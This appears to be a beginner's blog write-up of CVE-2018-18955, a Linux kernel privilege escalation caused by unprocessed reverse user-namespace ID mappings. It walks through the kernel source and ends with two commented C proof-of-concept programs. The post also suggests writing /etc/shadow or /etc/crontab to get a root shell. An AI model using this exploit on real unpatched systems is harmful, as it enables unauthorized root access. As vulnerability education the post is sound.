theres no posts about this cve as far as i know, and the original advisory is just too difficult for newbies like me, so..
warm up
whats user namespace
lets assume you use linux, man user_namespaces
will give you what you need
in case you aint familiar with linux namespaces, man namespaces
says:
Namespace Constant Isolates
Cgroup CLONE_NEWCGROUP Cgroup root directory
IPC CLONE_NEWIPC System V IPC, POSIX message queues
Network CLONE_NEWNET Network devices, stacks, ports, etc.
Mount CLONE_NEWNS Mount points
PID CLONE_NEWPID Process IDs
User CLONE_NEWUSER User and group IDs
UTS CLONE_NEWUTS Hostname and NIS domain name
in particular, user namespaces:
User namespaces isolate security-related identifiers and attributes, in particular, user IDs and group IDs (see credentials(7)), the root directory, keys (see keyrings(7)), and capabilities (see capabili‐ ties(7)). A process's user and group IDs can be different inside and outside a user namespace. In par‐ ticular, a process can have a normal unprivileged user ID outside a user namespace while at the same time having a user ID of 0 inside the namespace; in other words, the process has full privileges for opera‐ tions inside the user namespace, but is unprivileged for operations outside the namespace.
in CVE-2018-18955 (im gonna call it the cve), nested user namespace is used, heres some info about nested user ns:
User namespaces can be nested; that is, each user namespace—except the initial ("root") namespace— has a parent user namespace, and can have zero or more child user namespaces. The parent user namespace is the user namespace of the process that creates the user namespace via a call to unshare(2) or clone(2) with the CLONE_NEWUSER flag.
and whats uid/gid mapping
the cve uses broken uid/gid mapping to achieve privilege escalation (LPE), so first we have to get a basic understanding about id mapping
from man newuidmap
, we get this:
uid
Beginning of the range of UIDs inside the user namespace.
loweruid
Beginning of the range of UIDs outside the user namespace.
count
Length of the ranges (both inside and outside the user namespace).
for loweruid
, theres a file /etc/subuid
, which sets limit for loweruid
:
newuidmap
verifies that the caller is the owner of the process indicated by pid and that for each of the above sets, each of the UIDs in the range[loweruid, loweruid+count]
is allowed to the caller according to/etc/subuid
before setting/proc/[pid]/uid_map
for me, its like:
i can create some uid mapping like 0 100000 1000
analysis of cve-2018-18955
the culprit
from the original advisory, we know that its 6397fac4915a
causing the cve, so we check it out:
heres the fix:
find the coresponding source file, kernel/user_namespace.c
locate map_write()
, see what it does:
in the first loop, insert_extent()
inserts every extent of a mapping array into new_map
, who has the type struct uid_gid_map
the term extent represents one id mapping, when a mapping array has more than one mappings. heres an example with 6 extents
0 0 1
1 1 1
2 2 1
3 3 1
4 4 1
5 5 995
then new_map
uses sort_idmaps()
to sort its two arrays of mappings (new_map->forward
, new_map->reverse
)
UID_GID_MAP_MAX_BASE_EXTENTS
is 5
, you can find it in the struct uid_gid_map
screenshot.
when count of extents (map->nrextents
) exceeds 5, sort_idmaps()
sorts both arrays, for bsearch()
later
the two arrays represents two directions of id mapping, as the original advisory says:
binary search over a sorted array of struct uid_gid_extent is used. Because ID mappings are queried in both directions (kernel ID to namespaced ID and namespaced ID to kernel ID), two copies of the array are created, one per direction, and they are sorted differently.
after sorting, every extent of new_map
gets into the second loop
map_id_range_down()
does the following
lower_first
(starting id of parent ns) of the new_map
(will be our nested ns later) is replaced with the lower_first
id of parent_map
in this loop, which means, the lower_first
id is mapped to the kernel ns
after map_id_range_down()
, new_map->forward
array has replaced its lower_first
with new ones, but the new_map->reverse
array remains untouched
lets rethink what map_write()
does
given the id mapping of parent ns, and the map to write to, map_write()
inserts each extent into the new_map
, and sorts both of its two arrays, then maps the lower_first
from new_map->forward
to kernel, while new_map->reverse
array is untouched. in this process, parent_map
provides a way up to the kernel, via lower_first
the reverse mapping, which maps kernel ids to the ns, remains the same thing that sort_idmaps()
produces
yes, new_map->reverse
is generated by sort_idmaps()
in the following way:
its a copy of the forward array, just a different sorting
as the sorting happens before the "mapping to kernel" loop, the reverse mapping is acutally not processed, then map_write()
installs the new map anyways, as a result, we have broken id mapping in the new ns, where the kernel to ns mapping is acutally the unprocessed reversing of the ns to kernel (forward) mapping.
say if we have a uid range of 0..1000
, as the initial mapping to install, according to the analysis above, we will eventually get 0..1000
as our kernel to ns uid mapping, thus, something unexpected is about to happen
leverage the broken id mapping
according to the author of CVE-2018-18955 (jannh@google.com), from_kuid()
is used in kuid_has_mapping()
, which in turn is used by some capability checking functions such as inode_owner_or_capable()
and privileged_wrt_inode_uidgid()
.
thats where LPE comes in, from_kuid()
gives incorrect ids, resulting a incorrect capability checking, which allows attacker to gain write access to inodes they are not supposed to write
i have a bunch of screenshots to visualize this process
finally, we are searching in map->reverse
, which is broken from the very begining (when its been written)
proof of concept
you can just check the original advisory for PoC
heres my screenshot showing how it works
since you can write /etc/shadow
, why not just write some cron job to /etc/crontab
and be root?
thanks for reading such an boring post, i am gonna show you something more boring, with comments:
- subuid_shell.c
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>
int main(void)
{
int sync_pipe[2];
char dummy;
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
err(1, "pipe");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
// kill child if parent dies
prctl(PR_SET_PDEATHSIG, SIGKILL);
close(sync_pipe[1]);
// create new ns
if (unshare(CLONE_NEWUSER))
err(1, "unshare userns");
if (write(sync_pipe[0], "X", 1) != 1)
err(1, "write to sock");
if (read(sync_pipe[0], &dummy, 1) != 1)
err(1, "read from sock");
// set uid and gid to 0, in child ns
if (setgid(0))
err(1, "setgid");
if (setuid(0))
err(1, "setuid");
// replace process with bash shell, in which you will see "root",
// as the setuid(0) call worked
// this might seem a little confusing, but you are "root" only to this child ns,
// thus, no permission to the outside ns
execl("/bin/bash", "bash", NULL);
err(1, "exec");
}
close(sync_pipe[0]);
if (read(sync_pipe[1], &dummy, 1) != 1)
err(1, "read from sock");
// set id mapping (0..1000) for child process
char cmd[1000];
sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
if (system(cmd))
errx(1, "denying setgroups failed");
sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
if (system(cmd))
errx(1, "newuidmap failed");
sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
if (system(cmd))
errx(1, "newgidmap failed");
if (write(sync_pipe[1], "X", 1) != 1)
err(1, "write to sock");
int status;
if (wait(&status) != child)
err(1, "wait");
return 0;
}
- subshell.c
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>
int main(void)
{
int sync_pipe[2];
char dummy;
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
err(1, "pipe");
// create a child process
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
// in child process
close(sync_pipe[1]);
// this creates a new ns
if (unshare(CLONE_NEWUSER))
err(1, "unshare userns");
if (write(sync_pipe[0], "X", 1) != 1)
err(1, "write to sock");
if (read(sync_pipe[0], &dummy, 1) != 1)
err(1, "read from sock");
// start a bash process (replace process image)
// this time you are actually root, without the name/id, though
// technically the root access is not complete,
// to get complete root, write to /etc/crontab and wait for a root shell to pop up
execl("/bin/bash", "bash", NULL);
err(1, "exec");
}
close(sync_pipe[0]);
if (read(sync_pipe[1], &dummy, 1) != 1)
err(1, "read from sock");
char pbuf[100]; // path of uid_map
sprintf(pbuf, "/proc/%d", (int)child);
// cd to /proc/pid/uid_map
if (chdir(pbuf))
err(1, "chdir");
// our new id mapping with 6 extents (> 5 extents)
const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
// write the new mapping to uid_map and gid_map
int uid_map = open("uid_map", O_WRONLY);
if (uid_map == -1)
err(1, "open uid map");
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
err(1, "write uid map");
close(uid_map);
int gid_map = open("gid_map", O_WRONLY);
if (gid_map == -1)
err(1, "open gid map");
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
err(1, "write gid map");
close(gid_map);
if (write(sync_pipe[1], "X", 1) != 1)
err(1, "write to sock");
int status;
if (wait(&status) != child)
err(1, "wait");
return 0;
}
Comments
comments powered by Disqus